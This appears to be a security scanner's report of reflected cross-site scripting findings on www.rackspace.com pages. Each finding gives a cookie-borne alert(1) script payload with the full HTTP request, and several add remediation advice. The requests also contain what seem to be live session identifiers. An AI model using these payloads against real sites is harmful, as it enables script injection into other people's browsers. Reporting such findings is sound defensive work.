The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7ab2d"%3balert(1)//c8c550a8316 was submitted in the IS_UASrackuid cookie. This input was echoed as 7ab2d";alert(1)//c8c550a8316 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forms/solutionpartnerapplication.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f87ab2d"%3balert(1)//c8c550a8316; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a8df"><script>alert(1)</script>9cf31486a17 was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /forms/solutionpartnerapplication.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f88a8df"><script>alert(1)</script>9cf31486a17; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82f0f"%3balert(1)//c249d4a93d4 was submitted in the chatslider cookie. This input was echoed as 82f0f";alert(1)//c249d4a93d4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forms/solutionpartnerapplication.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D82f0f"%3balert(1)//c249d4a93d4; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6151"><script>alert(1)</script>82ac6b2c10 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /forms/solutionpartnerapplication.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=Df6151"><script>alert(1)</script>82ac6b2c10; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6ad5"><script>alert(1)</script>663ea219130 was submitted in the IS_UASrackuid cookie. This input was echoed as a6ad5\"><script>alert(1)</script>663ea219130 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /hosting_knowledge/ HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8a6ad5"><script>alert(1)</script>663ea219130; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296937072; __utmb=47003812.1.10.1296919297; s_pv=rackspaceUS%3Awhyrackspace%3Anetwork%3Abandwidthbilling.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fd4c0</script><script>alert(1)</script>ffd93f2b131 was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /hosting_knowledge/ HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8fd4c0</script><script>alert(1)</script>ffd93f2b131; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296937072; __utmb=47003812.1.10.1296919297; s_pv=rackspaceUS%3Awhyrackspace%3Anetwork%3Abandwidthbilling.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f4d5"><script>alert(1)</script>9d7ebbabc58 was submitted in the chatslider cookie. This input was echoed as 1f4d5\"><script>alert(1)</script>9d7ebbabc58 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /hosting_knowledge/ HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296937072; __utmb=47003812.1.10.1296919297; s_pv=rackspaceUS%3Awhyrackspace%3Anetwork%3Abandwidthbilling.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D1f4d5"><script>alert(1)</script>9d7ebbabc58; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 24f3a</script><script>alert(1)</script>f7a96fbaeec was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /hosting_knowledge/ HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296937072; __utmb=47003812.1.10.1296919297; s_pv=rackspaceUS%3Awhyrackspace%3Anetwork%3Abandwidthbilling.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D24f3a</script><script>alert(1)</script>f7a96fbaeec; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e2d4"><script>alert(1)</script>dd6bddd1a07 was submitted in the IS_UASrackuid cookie. This input was echoed as 7e2d4\"><script>alert(1)</script>dd6bddd1a07 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /hosting_knowledge/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f87e2d4"><script>alert(1)</script>dd6bddd1a07; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.3.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=5; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8eb22</script><script>alert(1)</script>c05645a3c2e was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /hosting_knowledge/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f88eb22</script><script>alert(1)</script>c05645a3c2e; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.3.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=5; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26a18"><script>alert(1)</script>fa3d6c43159 was submitted in the chatslider cookie. This input was echoed as 26a18\"><script>alert(1)</script>fa3d6c43159 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /hosting_knowledge/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.3.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=5; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D26a18"><script>alert(1)</script>fa3d6c43159; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8b8b1</script><script>alert(1)</script>87ac17f0907 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /hosting_knowledge/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.3.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=5; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D8b8b1</script><script>alert(1)</script>87ac17f0907; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
